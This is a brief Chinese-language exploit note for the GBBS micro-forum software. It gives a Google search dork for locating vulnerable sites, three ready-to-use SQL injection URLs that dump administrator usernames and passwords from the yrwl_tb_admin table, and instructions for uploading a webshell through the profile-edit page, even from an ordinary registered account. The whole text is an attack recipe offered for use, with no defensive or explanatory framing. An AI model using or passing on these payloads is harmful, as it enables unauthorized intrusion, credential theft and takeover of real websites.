GBBS微论坛getshell

1.google搜索:inurl:"userinfo.asp?yhm="

2.注入exp:直接暴管理员密码

/userinfo.asp?yhm='%20union%20select%201,2,3,yhm%2bchr(35)%2bpass,5,6,7,8,9,10,11,12,13,14,15%20from%20yrwl_tb_admin
/ad.asp?ad='%20union%20select%201,2,3,4,5,6,7,8,yhm%2bchr(35)%2bpass%20from%20yrwl_tb_admin
/bbs_bj.asp?id=11%20and%201=2%20union%20select%201,yhm%2bchr(35)%2bpass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20yrwl_tb_admin

3.进入后台，在个人资料->修改个人信息 直接上传大马

或者 直接注册一用户，然后在个人资料->修改个人信息 直接上传大马